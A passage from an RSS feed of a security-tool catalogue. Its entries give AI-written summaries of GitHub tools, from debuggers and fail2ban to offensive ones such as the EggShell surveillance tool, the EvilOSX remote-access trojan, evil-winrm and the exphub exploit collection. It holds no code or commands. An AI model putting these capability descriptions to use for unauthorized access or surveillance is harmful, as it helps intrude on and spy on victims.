&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; E9Patch is a static binary rewriting tool designed for &lt;code&gt;x86_64&lt;/code&gt; Linux ELF binaries that enables users to modify and patch binaries without introducing dependencies, making the output a drop-in replacement. Notable features include its scalability for large binaries, fast rewriting capability, low overhead performance, and programmability for integration with other projects. With functionalities such as instruction instrumentation and various supported modes, E9Patch can effectively enhance binary behavior for tasks such as fuzzing and system call interception.&lt;/p&gt;</description></item><item><title>edb-debugger</title><link>https://rainmana.github.io/hackyfeed/tools/eteran-edb-debugger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/eteran-edb-debugger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; edb-debugger is a cross-platform debugger that supports AArch32, x86, and x86-64 architectures, facilitating development and debugging across multiple operating systems, with Linux as the officially supported platform. Notable features include a user-friendly interface, compatibility with modern compilers and libraries, and ongoing development for additional platforms such as FreeBSD, OpenBSD, OSX, and Windows. The tool aims to replicate and extend the capabilities of Ollydbg while adding multi-architecture support.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://gitter.im/eteran/edb-debugger?utm_source=badge&amp;amp;utm_medium=badge&amp;amp;utm_campaign=pr-badge"&gt;&lt;img src="https://badges.gitter.im/eteran/edb-debugger.svg" alt="Gitter"&gt;&lt;/a&gt;
&lt;a href="https://github.com/eteran/edb-debugger/actions/workflows/build.yaml"&gt;&lt;img src="https://github.com/eteran/edb-debugger/actions/workflows/build.yaml/badge.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://ci.appveyor.com/project/eteran/edb-debugger"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/91jfbbyg075wk96q?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html"&gt;&lt;img src="https://img.shields.io/badge/license-GPL2-blue.svg" alt="License"&gt;&lt;/a&gt;
&lt;a href="https://www.paypal.com/cgi-bin/webscr?cmd=_donations&amp;amp;business=evan%2eteran%40gmail%2ecom&amp;amp;lc=US&amp;amp;item_name=edb%2ddebugger&amp;amp;currency_code=USD&amp;amp;bn=PP%2dDonationsBF%3a68747470733a2f2f696d672e736869656c64732e696f2f62616467652f446f6e6174652d50617950616c2d677265656e2e737667%3aNonHosted"&gt;&lt;img src="https://img.shields.io/badge/Donate-PayPal-green.svg" alt="Paypal"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>eDBG</title><link>https://rainmana.github.io/hackyfeed/tools/shinoleah-edbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shinoleah-edbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; eDBG is a lightweight CLI debugger based on eBPF, designed for Android ARM64 platforms, which offers enhanced resistance to anti-debugging mechanisms compared to traditional ptrace-based debuggers. Its notable features include a user-friendly CLI interface akin to pwndbg, support for standard debugging functionalities, and a file and offset-based breakpoint registration system that facilitates fast startup and multi-threaded or multi-process debugging. Additionally, eDBG operates without direct program attachment, enabling stable dynamic analysis with minimal intrusion.&lt;/p&gt;</description></item><item><title>efiXplorer</title><link>https://rainmana.github.io/hackyfeed/tools/rehints-efixplorer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rehints-efixplorer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; efiXplorer is an IDA plugin and loader designed for the analysis and automation of reverse engineering UEFI firmware. Its primary use case is to facilitate the discovery of vulnerabilities in UEFI firmware through automated static analysis, and it provides features that enhance the recovery of service function calls within such firmware. Notably, it supports integration with various hex-ray tools and includes comprehensive documentation for installation and usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://www.gnu.org/licenses/gpl-3.0"&gt;&lt;img src="https://img.shields.io/badge/License-GPL%20v3-blue.svg" alt="License: GPL v3"&gt;&lt;/a&gt;
&lt;a href="https://github.com/rehints/efiXplorer/actions"&gt;&lt;img src="https://github.com/rehints/efiXplorer/actions/workflows/build.yml/badge.svg" alt="efiXplorer CI"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>EggShell</title><link>https://rainmana.github.io/hackyfeed/tools/lucasjacks0n-eggshell/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lucasjacks0n-eggshell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EggShell is a post-exploitation surveillance tool developed in Python, designed for establishing command line sessions on target machines with extended functionalities. Notable features include file uploading/downloading, tab completion, command execution, photo capturing, and device location tracking, with enhanced security through SSL and support for Linux and iOS in version 3.0.0. This tool serves as a proof of concept for penetration testing on devices that users own.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="eggshell"&gt;&lt;a href="http://lucasjackson.io/eggshell"&gt;EggShell&lt;/a&gt;&lt;/h1&gt;
&lt;h2 id="about"&gt;About&lt;/h2&gt;
&lt;p&gt;EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.&lt;/p&gt;</description></item><item><title>ElectricEye</title><link>https://rainmana.github.io/hackyfeed/tools/jonrau1-electriceye/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jonrau1-electriceye/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ElectricEye is a comprehensive Python CLI tool designed for multi-cloud and multi-SaaS environments that focuses on Asset Management, Security Posture Management, and Attack Surface Monitoring. It supports over 100 services and conducts more than 1000 checks aligned with over 20 regulatory and best practice frameworks, enabling organizations to enhance their cloud security and compliance effortlessly. Notable features include cross-Account, cross-Region capabilities and support for major platforms like AWS, GCP, Azure, and more, making it a versatile solution for managing diverse cloud architectures.&lt;/p&gt;</description></item><item><title>elpscrk</title><link>https://rainmana.github.io/hackyfeed/tools/d4vinci-elpscrk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/d4vinci-elpscrk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Elpscrk is an intelligent password generation tool designed to create permutations based on user-provided information about a target, effectively generating potential passwords through statistical methodologies. It offers six complication levels ranging from simple to highly complex, enabling tailored password generation based on the user&amp;rsquo;s customization needs. Notably, Elpscrk is memory efficient and capable of producing up to one million password combinations, making it a powerful option for password profiling and security analysis.&lt;/p&gt;</description></item><item><title>EmailAll</title><link>https://rainmana.github.io/hackyfeed/tools/taonn-emailall/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/taonn-emailall/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EmailAll is a powerful email collection tool designed to aggregate email addresses from various online sources, including search engines and datasets. Its primary use case is to support cybersecurity professionals in gathering emails for domain reconnaissance, and it features integration with multiple API services for data retrieval along with modular results storage in JSON format. The tool allows easy configuration for proxies and APIs, enhancing its flexibility for various deployment environments.&lt;/p&gt;</description></item><item><title>emploleaks</title><link>https://rainmana.github.io/hackyfeed/tools/infobyte-emploleaks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infobyte-emploleaks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EmploLeaks is an Open Source Intelligence (OSINT) tool that facilitates the gathering of employee information from companies, primarily utilizing LinkedIn to extract employee lists and personal email addresses. Notable features include the ability to search a custom COMB database for leaked passwords using the retrieved emails, and an extension for identifying personal code repositories on GitLab. The tool requires Python for installation and offers a user-friendly command-line interface for executing its functionalities.&lt;/p&gt;</description></item><item><title>EntityFramework-Reverse-POCO-Code-First-Generator</title><link>https://rainmana.github.io/hackyfeed/tools/sjh37-entityframework-reverse-poco-code-first-generator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sjh37-entityframework-reverse-poco-code-first-generator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The EntityFramework Reverse POCO Code First Generator is a tool designed to reverse engineer existing databases and generate fully customizable Entity Framework Code First POCO classes along with configuration mappings and DbContext setups. Its primary use case is to facilitate the rapid creation of data access code that mimics hand-crafted designs, enhancing readability and maintainability. Notable features include support for multiple database types (including SQL Server and PostgreSQL), customizable output through template files, and integration with Visual Studio via a VSIX installer.&lt;/p&gt;</description></item><item><title>enum4linux-ng</title><link>https://rainmana.github.io/hackyfeed/tools/cddmp-enum4linux-ng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cddmp-enum4linux-ng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; enum4linux-ng is an advanced enumeration tool designed for extracting information from Windows and Samba systems, primarily targeted at security professionals and CTF participants. It builds on the capabilities of the original enum4linux by incorporating enhanced output parsing, allowing for findings to be exported in YAML or JSON formats, and implementing features such as multiple authentication methods, smart enumeration, and support for both IPv6 and SMBv1.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;enum4linux-ng&lt;/h1&gt;
&lt;p align="center"&gt;
&lt;strong&gt;A next generation version of enum4linux&lt;/strong&gt;
&lt;/p&gt;</description></item><item><title>epicgames-freegames-node</title><link>https://rainmana.github.io/hackyfeed/tools/claabs-epicgames-freegames-node/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/claabs-epicgames-freegames-node/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EpicGames-FreeGames-Node is an automated tool designed to log into the Epic Games Store and identify available free games efficiently. Its primary use case is to simplify the process of retrieving checkout links for free games across multiple user accounts and can be executed on a scheduled basis. Notable features include support for JSON configuration, multiple notification mechanisms (such as email, Discord, and Telegram), and the ability to handle device code authentication for logging in.&lt;/p&gt;</description></item><item><title>ESP32-DIV</title><link>https://rainmana.github.io/hackyfeed/tools/cifertech-esp32-div/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cifertech-esp32-div/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ESP32-DIV is an open-source multi-band wireless toolkit based on the ESP32, designed for wireless testing, signal analysis, jammer development, and protocol spoofing across Wi-Fi, BLE, 2.4GHz, and Sub-GHz frequency bands. Notable features include real-time packet monitoring, Wi-Fi deauthentication attacks, Bluetooth advertisement spoofing, and Sub-GHz command replay capabilities. The toolkit is intended strictly for educational and research purposes to ensure ethical usage in wireless security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;div align="center"&gt;
 &lt;img src="https://github.com/user-attachments/assets/a30bde48-e39d-4b11-8749-3401bcb82a68" width="150"&gt;
 &lt;h1&gt;&lt;span&gt;ESP32-DIV&lt;/span&gt;&lt;/h1&gt;
&lt;/div&gt;
 &lt;p&gt;
 ESP32DIV - Advanced Wireless Toolkit
 &lt;/p&gt;</description></item><item><title>espoofer</title><link>https://rainmana.github.io/hackyfeed/tools/chenjj-espoofer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chenjj-espoofer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; espoofer is an open-source tool designed to assess vulnerabilities in email systems related to SPF, DKIM, and DMARC authentication protocols. It aims to aid mail server administrators and penetration testers in identifying potential weaknesses that could be exploited for email spoofing attacks. Notable features include three operational modes—server, client, and manual—that facilitate comprehensive testing of both sending and receiving services.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="espoofer"&gt;espoofer&lt;/h1&gt;
&lt;p&gt;&lt;em&gt;espoofer&lt;/em&gt; is an open-source testing tool to bypass SPF, DKIM, and DMARC authentication in email systems. It helps mail server administrators and penetration testers to check whether the target email server and client are vulnerable to email spoofing attacks or can be abused to send spoofing emails.&lt;/p&gt;</description></item><item><title>ethereum-lists</title><link>https://rainmana.github.io/hackyfeed/tools/myetherwallet-ethereum-lists/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/myetherwallet-ethereum-lists/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ethereum-lists is a collaborative repository that maintains and updates lists of malicious URLs, fake token addresses, Ethereum addresses, and contract details, facilitating community contributions through pull requests. Its primary use case is to serve as a resource for users to identify and avoid phishing attempts and fraudulent tokens within the Ethereum ecosystem. Notable features include an easily accessible structure for submitting changes and clear guidelines for contributions, promoting community involvement in enhancing security awareness.&lt;/p&gt;</description></item><item><title>Ethical-Hacking-Labs</title><link>https://rainmana.github.io/hackyfeed/tools/samsar4-ethical-hacking-labs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samsar4-ethical-hacking-labs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ethical Hacking Labs is a comprehensive educational resource designed for students and professionals in the cybersecurity field, providing a hands-on approach to learning ethical hacking techniques. It includes a series of tutorials that cover essential topics such as networking, system administration, and various ethical hacking methodologies, from basic to advanced practices. Notable features include practical labs, foundational modules on core knowledge, and guidance on using tools like Metasploit, Maltego, and Recon-ng for effective penetration testing and reconnaissance.&lt;/p&gt;</description></item><item><title>Ethical-Hacking-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/hhhrrrttt222111-ethical-hacking-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hhhrrrttt222111-ethical-hacking-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ethical-Hacking-Tools is a repository that provides a curated collection of tools and resources for ethical hacking and penetration testing. Its primary use case is to assist cybersecurity professionals in identifying and addressing vulnerabilities within computer systems and networks. Notable features include links to various Linux distributions optimized for security testing, such as Kali Linux and Parrot OS, along with educational content on hacking practices and hacker classifications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ethical-hacking-tools"&gt;Ethical-Hacking-Tools&lt;/h1&gt;
&lt;br&gt;
&lt;p&gt;&lt;a href="https://forthebadge.com"&gt;&lt;img src="https://forthebadge.com/images/badges/built-with-love.svg" alt="forthebadge"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>evil-winrm</title><link>https://rainmana.github.io/hackyfeed/tools/hackplayers-evil-winrm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackplayers-evil-winrm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Evil-WinRM is a versatile Ruby-based tool designed for penetration testing that facilitates remote command execution via Windows Remote Management (WinRM) protocol. It supports advanced features such as in-memory script and DLL execution, pass-the-hash and Kerberos authentication, SSL, and customizable logging, making it particularly effective for post-exploitation scenarios. The tool is compatible with both Linux and Windows clients, providing a robust interface for querying and managing remote Windows systems while bypassing some antivirus defenses.&lt;/p&gt;</description></item><item><title>evillimiter</title><link>https://rainmana.github.io/hackyfeed/tools/bitbrute-evillimiter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bitbrute-evillimiter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Evil Limiter is a network management tool designed to monitor, analyze, and control the bandwidth of devices on a local network without needing physical or administrative access. Utilizing ARP spoofing and traffic shaping techniques, it enables users to throttle upload and download speeds for specific hosts, block internet connections, and manage network resources effectively through a command-line interface. Notable features include automatic network configuration detection, the ability to scan IP ranges, and manage hosts dynamically with various commands for limiting and unblocking access.&lt;/p&gt;</description></item><item><title>EvilOSX</title><link>https://rainmana.github.io/hackyfeed/tools/marten4n6-evilosx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marten4n6-evilosx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EvilOSX is a Remote Administration Tool (RAT) designed for macOS that enables stealthy monitoring and control of compromised systems. It boasts features such as terminal emulation, module extensibility, and the ability to retrieve sensitive user data like passwords and iCloud tokens, all while remaining undetected by antivirus solutions through encrypted payloads. Additionally, it includes functionalities for taking screenshots, recording audio, and executing local privilege escalation attempts, making it a potent tool for unauthorized system access and data exfiltration.&lt;/p&gt;</description></item><item><title>evilwaf</title><link>https://rainmana.github.io/hackyfeed/tools/matrixleons-evilwaf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/matrixleons-evilwaf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EvilWAF is a sophisticated transparent MITM Firewall bypass proxy and deep WAF vulnerability scanner designed for authorized security testing purposes. It operates at the transport layer, allowing seamless integration with various security tools while employing advanced techniques such as TCP and TLS fingerprint rotation, source port manipulation, and automated WAF detection to evade defensive mechanisms. Notable features include a comprehensive multi-layer WAF scanning capability, direct origin bypass, and a robust IP rotation strategy through Tor and proxy pools, ensuring effective assessment of firewall vulnerabilities.&lt;/p&gt;</description></item><item><title>Exegol</title><link>https://rainmana.github.io/hackyfeed/tools/theporgs-exegol/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/theporgs-exegol/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Exegol is a modular cybersecurity environment tailored for offensive security professionals, addressing traditional security distribution challenges. Its primary use case is for hackers and security experts who require a reliable toolkit for field operations. Notable features include its customizable structure and community-driven design, enhancing usability and effectiveness in practical cybersecurity applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://docs.exegol.com/external/banner.png" alt="banner"&gt;&lt;/p&gt;
&lt;p&gt;Exegol is a comprehensive cybersecurity environment designed by offensive security experts, for fellow hackers, with its community. It solves the common pain points of traditional security distributions by providing a modular and reliable toolkit that&amp;rsquo;s made for the field.&lt;/p&gt;</description></item><item><title>exphub</title><link>https://rainmana.github.io/hackyfeed/tools/zhzyker-exphub/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zhzyker-exphub/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Exphub is a vulnerability exploitation script repository containing various Proof of Concept (PoC) and exploit scripts for commonly exploited vulnerabilities across platforms like Weblogic, Struts2, Tomcat, and Drupal. It includes detailed usage documentation for a wide range of scripts, such as remote command execution (RCE) and Webshell uploader scripts, all of which have been tested for effectiveness. The tool aims to streamline the process of vulnerability scanning and exploitation by consolidating multiple scripts for easy access and execution.&lt;/p&gt;</description></item><item><title>exploitnotes</title><link>https://rainmana.github.io/hackyfeed/tools/hdks-bug-exploitnotes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hdks-bug-exploitnotes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Exploit Notes is a comprehensive resource platform designed for security research, focusing on hacking techniques and tools applicable to penetration testing, bug bounty programs, and Capture The Flag (CTF) challenges. It encompasses a wide array of topics including reconnaissance, various operating systems, web applications, databases, networks, and emerging technologies such as AI and blockchain. Users can leverage this repository for educational purposes, with the option to run it locally via a straightforward setup process.&lt;/p&gt;</description></item><item><title>extract_otp_secrets</title><link>https://rainmana.github.io/hackyfeed/tools/scito-extract_otp_secrets/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/scito-extract_otp_secrets/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &lt;code&gt;extract_otp_secrets&lt;/code&gt; tool is a Python script designed to extract one-time password (OTP) secrets from QR codes generated by two-factor authentication applications, such as Google Authenticator. It supports multiple input methods, including live capture from a camera, image files, and text files from external QR code readers, while allowing users to export the extracted secrets to JSON or CSV formats or print them as QR codes. Notable features include a built-in GUI for live QR code capture and flexible output options.&lt;/p&gt;</description></item><item><title>eyeballer</title><link>https://rainmana.github.io/hackyfeed/tools/bishopfox-eyeballer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bishopfox-eyeballer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Eyeballer is a tool designed for large-scope network penetration testing, specifically aimed at identifying potentially vulnerable web hosts from a vast collection of screenshots. It employs machine learning to classify sites into categories such as &amp;ldquo;Old-Looking Sites,&amp;rdquo; &amp;ldquo;Login Pages,&amp;rdquo; and &amp;ldquo;Parked Domains,&amp;rdquo; allowing users to prioritize targets based on their likelihood of containing vulnerabilities. Notable features include support for GPU usage, a user-friendly setup process, and integration with popular screenshotting tools like EyeWitness and GoWitness.&lt;/p&gt;</description></item><item><title>f8x</title><link>https://rainmana.github.io/hackyfeed/tools/ffffffff0x-f8x/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ffffffff0x-f8x/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; f8x is an automated deployment tool focused on Infrastructure as Code (IaC) that leverages Terraform and Wails to facilitate multi-cloud deployment and project orchestration. Its primary use case includes setting up various environments for Red/Blue team operations, providing options for batch installations of essential tools, and deploying specific environments such as CTFs and middleware with minimal dependencies. Notable features include a variety of installation options for development and pentesting environments, and full compatibility with multiple Linux distributions.&lt;/p&gt;</description></item><item><title>Facebook-BugBounty-Writeups</title><link>https://rainmana.github.io/hackyfeed/tools/jaiswalakshansh-facebook-bugbounty-writeups/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jaiswalakshansh-facebook-bugbounty-writeups/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Meta(Facebook) Bug Bounty Writeups repository compiles a collection of documented vulnerabilities discovered on Facebook, showcasing varying bounty rewards ranging from account takeovers to remote code execution. Its primary use case is to serve as a resource for security researchers and ethical hackers to share and learn from reported vulnerabilities in Meta&amp;rsquo;s platforms. Notable features include a chronological organization of writeups, contributing guidelines, and links to detailed analysis articles for each reported bug.&lt;/p&gt;</description></item><item><title>fail2ban</title><link>https://rainmana.github.io/hackyfeed/tools/fail2ban-fail2ban/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fail2ban-fail2ban/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fail2Ban is a security tool that monitors log files for multiple failed authentication attempts, automatically banning IP addresses that exceed a specified threshold by updating firewall rules. It supports various standard log files, including those from SSH and Apache, and can be configured to monitor custom log files as needed. Notable features include its capability to work with both IPv4 and IPv6 addresses, and a client-server architecture for managing configurations and interactions.&lt;/p&gt;</description></item><item><title>fame</title><link>https://rainmana.github.io/hackyfeed/tools/certsocietegenerale-fame/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/certsocietegenerale-fame/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FAME (FAME Automates Malware Evaluation) is a Python-based framework designed to automate and enhance the analysis of malicious files, enabling analysts to quickly identify malware families and extract relevant configurations and indicators of compromise (IOCs). The tool utilizes Flask for its web interface and Celery for managing background tasks, streamlining the end-to-end analysis process. FAME aims to empower malware analysis efforts by providing an efficient and user-friendly solution for processing malware samples.&lt;/p&gt;</description></item><item><title>faraday</title><link>https://rainmana.github.io/hackyfeed/tools/infobyte-faraday/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infobyte-faraday/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Faraday is an open-source vulnerability management tool designed to facilitate the organization, aggregation, and visualization of security data in a multiuser environment. Its primary use case is to streamline vulnerability discovery and management by integrating various community tools while providing insightful visualizations for both managers and analysts. Notable features include its command-line interface for direct terminal access, support for multiple installation methods (including Docker and PyPi), and the ability to automate scanning tools within CI/CD pipelines.&lt;/p&gt;</description></item><item><title>fav-up</title><link>https://rainmana.github.io/hackyfeed/tools/pielco11-fav-up/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pielco11-fav-up/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fav-up is a tool that leverages favicon icons to identify real IP addresses using the Shodan API. It supports multiple lookup methods, including local files, URLs, and domain searches, and can output results in CSV or JSON formats. Key features include customizable API key input options, support for batch processing via input lists, and the ability to retrieve detailed information such as favicon hashes and associated masked IPs.&lt;/p&gt;</description></item><item><title>FavFreak</title><link>https://rainmana.github.io/hackyfeed/tools/devanshbatham-favfreak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/devanshbatham-favfreak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FavFreak is a reconnaissance tool that streamlines the process of gathering information using favicon hashes from a list of URLs. It fetches the favicon.ico for each URL, computes its hash, and matches it against a predefined fingerprint dictionary to identify known services. Key features include sorting results by favicon hashes and generating Shodan dorks, making it a valuable asset for bug bounty hunters and OSINT investigations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="favfreak---weaponizing-faviconico-for-bugbounties--osint-and-what-not"&gt;FavFreak - Weaponizing favicon.ico for BugBounties , OSINT and what not&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://raw.githubusercontent.com/devanshbatham/FavFreak/master/static/logo.PNG" alt="FacFreak"&gt;&lt;/p&gt;</description></item><item><title>FBI-tools</title><link>https://rainmana.github.io/hackyfeed/tools/danieldurnea-fbi-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danieldurnea-fbi-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FBI-tools is a comprehensive Open Source Intelligence (OSINT) toolkit featuring a variety of tools for analysts to gather and analyze data from multiple online sources. Its notable features include domain squatting detection with SquatSquasher, web reconnaissance capabilities with reNgine, and efficient user account searches across platforms using UsernameSearchOSINT. Additionally, the collection encompasses specialized tools for investigating social media, phone numbers, and dark web intelligence, streamlining the OSINT process.&lt;/p&gt;</description></item><item><title>featherduster</title><link>https://rainmana.github.io/hackyfeed/tools/nccgroup-featherduster/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nccgroup-featherduster/</guid><description>&lt;blockquote&gt;
